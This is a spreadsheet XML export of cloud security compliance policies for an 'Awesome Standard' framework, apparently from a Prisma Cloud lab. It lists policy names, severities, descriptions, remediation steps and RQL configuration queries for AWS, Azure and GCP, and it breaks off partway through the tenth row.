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wesome Standard Policie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E0"/>
        <bgColor rgb="00FFFFE0"/>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K3535"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Standard</t>
        </is>
      </c>
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>Included</t>
        </is>
      </c>
      <c r="C1" s="1" t="inlineStr">
        <is>
          <t>SectionOption</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>Resolved</t>
        </is>
      </c>
      <c r="E1" s="1" t="inlineStr">
        <is>
          <t>Open</t>
        </is>
      </c>
      <c r="F1" s="1" t="inlineStr">
        <is>
          <t>Dismissed</t>
        </is>
      </c>
      <c r="G1" s="1" t="inlineStr">
        <is>
          <t>Enabled</t>
        </is>
      </c>
      <c r="H1" s="1" t="inlineStr">
        <is>
          <t>Rules</t>
        </is>
      </c>
      <c r="I1" s="1" t="inlineStr">
        <is>
          <t>CloudType</t>
        </is>
      </c>
      <c r="J1" s="1" t="inlineStr">
        <is>
          <t>Service</t>
        </is>
      </c>
      <c r="K1" s="1" t="inlineStr">
        <is>
          <t>PolicyName</t>
        </is>
      </c>
      <c r="L1" s="1" t="inlineStr">
        <is>
          <t>FindingTypes</t>
        </is>
      </c>
      <c r="M1" s="1" t="inlineStr">
        <is>
          <t>Severity</t>
        </is>
      </c>
      <c r="N1" s="1" t="inlineStr">
        <is>
          <t>Owner</t>
        </is>
      </c>
      <c r="O1" s="1" t="inlineStr">
        <is>
          <t>PolicyType</t>
        </is>
      </c>
      <c r="P1" s="1" t="inlineStr">
        <is>
          <t>PolicySubTypes</t>
        </is>
      </c>
      <c r="Q1" s="1" t="inlineStr">
        <is>
          <t>Requirement</t>
        </is>
      </c>
      <c r="R1" s="1" t="inlineStr">
        <is>
          <t>Section</t>
        </is>
      </c>
      <c r="S1" s="1" t="inlineStr">
        <is>
          <t>Labels</t>
        </is>
      </c>
      <c r="T1" s="1" t="inlineStr">
        <is>
          <t>Remediable</t>
        </is>
      </c>
      <c r="U1" s="1" t="inlineStr">
        <is>
          <t>PolicyClass</t>
        </is>
      </c>
      <c r="V1" s="1" t="inlineStr">
        <is>
          <t>API Name</t>
        </is>
      </c>
      <c r="W1" s="1" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="X1" s="1" t="inlineStr">
        <is>
          <t>Recommendation</t>
        </is>
      </c>
      <c r="Y1" s="1" t="inlineStr">
        <is>
          <t>Remediation</t>
        </is>
      </c>
      <c r="Z1" s="1" t="inlineStr">
        <is>
          <t>Policy RQL</t>
        </is>
      </c>
      <c r="AA1" s="1" t="inlineStr">
        <is>
          <t>LastModifiedBy</t>
        </is>
      </c>
      <c r="AB1" s="1" t="inlineStr">
        <is>
          <t>LastModifiedOn</t>
        </is>
      </c>
      <c r="AC1" s="1" t="inlineStr">
        <is>
          <t>Policy UPI</t>
        </is>
      </c>
      <c r="AD1" s="1" t="inlineStr">
        <is>
          <t>SystemDefault</t>
        </is>
      </c>
      <c r="AE1" s="1" t="inlineStr">
        <is>
          <t>PolicyMode</t>
        </is>
      </c>
      <c r="AF1" s="1" t="inlineStr">
        <is>
          <t>PolicyCategory</t>
        </is>
      </c>
      <c r="AG1" s="1" t="inlineStr">
        <is>
          <t>AccountGroups</t>
        </is>
      </c>
      <c r="AH1" s="1" t="inlineStr">
        <is>
          <t>PolicyID</t>
        </is>
      </c>
      <c r="AI1" s="1" t="inlineStr">
        <is>
          <t>search_id</t>
        </is>
      </c>
      <c r="AJ1" s="1" t="inlineStr">
        <is>
          <t>savedSearch</t>
        </is>
      </c>
      <c r="AK1" s="1" t="inlineStr">
        <is>
          <t>Reason</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B2" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C2" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D2" t="inlineStr"/>
      <c r="E2" t="inlineStr"/>
      <c r="F2" t="inlineStr"/>
      <c r="G2" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2" t="inlineStr"/>
      <c r="K2" t="inlineStr">
        <is>
          <t>AZURE mdavis1 Azure Storage account with shared access keys true</t>
        </is>
      </c>
      <c r="L2" t="inlineStr"/>
      <c r="M2" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S2" t="inlineStr">
        <is>
          <t>Awesome_Standard,Custom,AW_AZURE_Secure access management</t>
        </is>
      </c>
      <c r="T2" t="b">
        <v>0</v>
      </c>
      <c r="U2" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2" t="inlineStr"/>
      <c r="W2" t="inlineStr"/>
      <c r="X2" t="inlineStr"/>
      <c r="Y2" t="inlineStr"/>
      <c r="Z2" t="inlineStr"/>
      <c r="AA2" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2" t="inlineStr"/>
      <c r="AD2" t="b">
        <v>0</v>
      </c>
      <c r="AE2" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>7d3cc3f0-397f-4035-981b-9f83e9ddca26</t>
        </is>
      </c>
      <c r="AI2" t="inlineStr"/>
      <c r="AJ2" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK2" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B3" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C3" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D3" t="inlineStr"/>
      <c r="E3" t="inlineStr"/>
      <c r="F3" t="inlineStr"/>
      <c r="G3" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3" t="inlineStr"/>
      <c r="K3" t="inlineStr">
        <is>
          <t>AWS Pramm-s3-bucket-foo-new</t>
        </is>
      </c>
      <c r="L3" t="inlineStr"/>
      <c r="M3" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R3" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S3" t="inlineStr">
        <is>
          <t>Pramm,Awesome_Standard,Custom,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T3" t="b">
        <v>0</v>
      </c>
      <c r="U3" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3" t="inlineStr"/>
      <c r="W3" t="inlineStr"/>
      <c r="X3" t="inlineStr"/>
      <c r="Y3" t="inlineStr"/>
      <c r="Z3" t="inlineStr"/>
      <c r="AA3" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3" t="inlineStr"/>
      <c r="AD3" t="b">
        <v>0</v>
      </c>
      <c r="AE3" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>677451f6-ff2b-4ebd-a1e2-4247a54bb9d4</t>
        </is>
      </c>
      <c r="AI3" t="inlineStr"/>
      <c r="AJ3" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B4" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C4" s="2" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="D4" t="inlineStr"/>
      <c r="E4" t="inlineStr"/>
      <c r="F4" t="inlineStr"/>
      <c r="G4" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J4" t="inlineStr"/>
      <c r="K4" t="inlineStr">
        <is>
          <t>GCP PrashanthDigSecurity</t>
        </is>
      </c>
      <c r="L4" t="inlineStr"/>
      <c r="M4" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N4" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O4" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P4" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q4" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R4" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="S4" t="inlineStr">
        <is>
          <t>Awesome_Standard,Custom,AW_GCP_Inventory</t>
        </is>
      </c>
      <c r="T4" t="b">
        <v>0</v>
      </c>
      <c r="U4" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V4" t="inlineStr"/>
      <c r="W4" t="inlineStr"/>
      <c r="X4" t="inlineStr"/>
      <c r="Y4" t="inlineStr"/>
      <c r="Z4" t="inlineStr"/>
      <c r="AA4" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB4" t="inlineStr">
        <is>
          <t>2024-11-12 17:48:36</t>
        </is>
      </c>
      <c r="AC4" t="inlineStr"/>
      <c r="AD4" t="b">
        <v>0</v>
      </c>
      <c r="AE4" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF4" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>26a39962-eee8-4e7f-9b14-9ad971dbcb3a</t>
        </is>
      </c>
      <c r="AI4" t="inlineStr"/>
      <c r="AJ4" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK4" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B5" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C5" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D5" t="inlineStr"/>
      <c r="E5" t="inlineStr"/>
      <c r="F5" t="inlineStr"/>
      <c r="G5" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J5" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="K5" t="inlineStr">
        <is>
          <t>ALL event-policy</t>
        </is>
      </c>
      <c r="L5" t="inlineStr"/>
      <c r="M5" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N5" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O5" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P5" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q5" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R5" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S5" t="inlineStr">
        <is>
          <t>Awesome_Standard,Custom,CloudTrail,AW_ALL_Logging</t>
        </is>
      </c>
      <c r="T5" t="b">
        <v>0</v>
      </c>
      <c r="U5" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V5" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="W5" t="inlineStr"/>
      <c r="X5" t="inlineStr"/>
      <c r="Y5" t="inlineStr"/>
      <c r="Z5" t="inlineStr"/>
      <c r="AA5" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB5" t="inlineStr">
        <is>
          <t>2024-11-13 15:57:30</t>
        </is>
      </c>
      <c r="AC5" t="inlineStr"/>
      <c r="AD5" t="b">
        <v>0</v>
      </c>
      <c r="AE5" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF5" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>2318c607-5aac-40e7-b366-6b80f377a8e0</t>
        </is>
      </c>
      <c r="AI5" t="inlineStr"/>
      <c r="AJ5" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK5" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B6" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C6" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D6" t="inlineStr"/>
      <c r="E6" t="inlineStr"/>
      <c r="F6" t="inlineStr"/>
      <c r="G6" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J6" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="K6" t="inlineStr">
        <is>
          <t>AWS Network vpc flow records</t>
        </is>
      </c>
      <c r="L6" t="inlineStr"/>
      <c r="M6" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N6" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O6" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P6" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q6" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R6" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S6" t="inlineStr">
        <is>
          <t>Awesome_Standard,Custom,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T6" t="b">
        <v>0</v>
      </c>
      <c r="U6" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V6" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="W6" t="inlineStr"/>
      <c r="X6" t="inlineStr"/>
      <c r="Y6" t="inlineStr"/>
      <c r="Z6" t="inlineStr"/>
      <c r="AA6" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB6" t="inlineStr">
        <is>
          <t>2024-11-12 18:25:36</t>
        </is>
      </c>
      <c r="AC6" t="inlineStr"/>
      <c r="AD6" t="b">
        <v>0</v>
      </c>
      <c r="AE6" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF6" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>ba2bc15e-420e-4d2f-a74c-a86592f64cb9</t>
        </is>
      </c>
      <c r="AI6" t="inlineStr"/>
      <c r="AJ6" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK6" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B7" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C7" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D7" t="inlineStr"/>
      <c r="E7" t="inlineStr"/>
      <c r="F7" t="inlineStr"/>
      <c r="G7" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J7" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K7" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) has expired certificates</t>
        </is>
      </c>
      <c r="L7" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M7" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N7" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O7" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P7" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q7" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R7" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S7" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T7" t="b">
        <v>0</v>
      </c>
      <c r="U7" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V7" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W7" t="inlineStr">
        <is>
          <t>This policy identifies expired certificates which are in AWS Certificate Manager. AWS Certificate Manager (ACM) is the preferred tool to provision, manage, and deploy your server certificates. With ACM you can request a certificate or deploy an existing ACM or external certificate to AWS resources. This policy generates alerts if there are any expired ACM managed certificates. As a best practice, it is recommended to delete expired certificates.</t>
        </is>
      </c>
      <c r="X7" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Verify that the 'Status' column shows 'Expired' for the reported certificate
6. Under 'Actions' drop-down click on 'Delete'</t>
        </is>
      </c>
      <c r="Y7" t="inlineStr"/>
      <c r="Z7" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = '(_DateTime.ageInDays($.notAfter) &gt; -1) and status equals EXPIRED'</t>
        </is>
      </c>
      <c r="AA7" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB7" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC7" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-166</t>
        </is>
      </c>
      <c r="AD7" t="b">
        <v>1</v>
      </c>
      <c r="AE7" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF7" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>d1fae43a-5bb6-429a-945e-fec5e8d9c662</t>
        </is>
      </c>
      <c r="AI7" t="inlineStr">
        <is>
          <t>817318e9-27d8-4aba-bdbb-3f30629986da</t>
        </is>
      </c>
      <c r="AJ7" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK7" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B8" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C8" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D8" t="inlineStr"/>
      <c r="E8" t="inlineStr"/>
      <c r="F8" t="inlineStr"/>
      <c r="G8" t="b">
        <v>1</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J8" t="inlineStr">
        <is>
          <t>aws-acm</t>
        </is>
      </c>
      <c r="K8" t="inlineStr">
        <is>
          <t>AWS Certificate Manager (ACM) has certificates expiring in 30 days or less</t>
        </is>
      </c>
      <c r="L8" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M8" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N8" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O8" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P8" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q8" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R8" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S8" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T8" t="b">
        <v>0</v>
      </c>
      <c r="U8" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V8" t="inlineStr">
        <is>
          <t>aws-acm-describe-certificate</t>
        </is>
      </c>
      <c r="W8" t="inlineStr">
        <is>
          <t>This policy identifies ACM certificates expiring in 30 days or less, which are in the AWS Certificate Manager. If SSL/TLS certificates are not renewed prior to their expiration date, they will become invalid and the communication between the client and the AWS resource that implements the certificates is no longer secure. As a best practice, it is recommended to renew certificates before their validity period ends. AWS Certificate Manager automatically renews certificates issued by the service that is used with other AWS resources. However, the ACM service does not renew automatically certificates that are not in use or not associated anymore with other AWS resources. So the renewal process must be done manually before these certificates become invalid.
NOTE: If you wanted to be notified other than before or less than 30 days; you can clone this policy and replace '30' in RQL with your desired days value. For example, 15 days OR 7 days which will alert certificates expiring in 15 days or less OR 7 days or less respectively.</t>
        </is>
      </c>
      <c r="X8" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to the Certificate Manager(ACM) service
4. Choose the reported certificate
5. Verify that the 'Status' column shows 'Issued' for the reported certificate
6. Under 'Actions' drop-down select 'Reimport certificate' option
7. On the Import a certificate page, perform the following actions:
7a. In 'Certificate body*' box, paste the PEM-encoded certificate to import, purchased from your SSL certificate provider.
7b. In 'Certificate private key*' box, paste the PEM-encoded, unencrypted private key that matches the SSL/TLS certificate public key.
7c.(Optional) In 'Certificate chain' box, paste the PEM-encoded certificate chain delivered with the certificate body specified at step 7a.
8. Click on 'Review and import' button
9. On the Review and import page, review the imported certificate details then click on 'Import'</t>
        </is>
      </c>
      <c r="Y8" t="inlineStr"/>
      <c r="Z8" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-acm-describe-certificate' AND json.rule = 'status equals ISSUED and (_DateTime.ageInDays($.notAfter) &gt; -31)'</t>
        </is>
      </c>
      <c r="AA8" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB8" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC8" t="inlineStr">
        <is>
          <t>PC-AWS-ACM-327</t>
        </is>
      </c>
      <c r="AD8" t="b">
        <v>1</v>
      </c>
      <c r="AE8" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF8" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>369dcce6-f088-445d-95a7-777af0347821</t>
        </is>
      </c>
      <c r="AI8" t="inlineStr">
        <is>
          <t>cd84a846-2c3d-4062-9a61-c9e2c2b302a5</t>
        </is>
      </c>
      <c r="AJ8" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK8" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B9" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C9" s="2" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="D9" t="inlineStr"/>
      <c r="E9" t="inlineStr"/>
      <c r="F9" t="inlineStr"/>
      <c r="G9" t="b">
        <v>0</v>
      </c>
      <c r="H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 t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J9" t="inlineStr">
        <is>
          <t>aws-api</t>
        </is>
      </c>
      <c r="K9" t="inlineStr">
        <is>
          <t>Run test St</t>
        </is>
      </c>
      <c r="L9" t="inlineStr"/>
      <c r="M9" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N9" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O9" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P9" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q9" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R9" t="inlineStr">
        <is>
          <t>Inventory</t>
        </is>
      </c>
      <c r="S9" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Inventory,Custom</t>
        </is>
      </c>
      <c r="T9" t="b">
        <v>0</v>
      </c>
      <c r="U9" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V9" t="inlineStr">
        <is>
          <t>aws-api-gateway-authorizer</t>
        </is>
      </c>
      <c r="W9" t="inlineStr"/>
      <c r="X9" t="inlineStr"/>
      <c r="Y9" t="inlineStr"/>
      <c r="Z9" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-api-gateway-authorizer' AND json.rule = authType contains 42 limit search records to 100</t>
        </is>
      </c>
      <c r="AA9" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB9" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC9" t="inlineStr"/>
      <c r="AD9" t="b">
        <v>0</v>
      </c>
      <c r="AE9" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF9" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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 t="inlineStr">
        <is>
          <t>234e4c6b-5873-4357-83d7-084ed4ba3bb8</t>
        </is>
      </c>
      <c r="AI9" t="inlineStr">
        <is>
          <t>642a5386-5053-4a8b-be4d-4fa536894991</t>
        </is>
      </c>
      <c r="AJ9" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK9" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B10" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C10" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D10" t="inlineStr"/>
      <c r="E10" t="inlineStr"/>
      <c r="F10" t="inlineStr"/>
      <c r="G10" t="b">
        <v>1</v>
      </c>
      <c r="H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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J10" t="inlineStr">
        <is>
          <t>aws-apigateway</t>
        </is>
      </c>
      <c r="K10" t="inlineStr">
        <is>
          <t>AWS API Gateway endpoints without client certificate authentication</t>
        </is>
      </c>
      <c r="L10" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M10" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N10" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O10" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P10" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q10" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R10" t="inlineStr">
        <is>
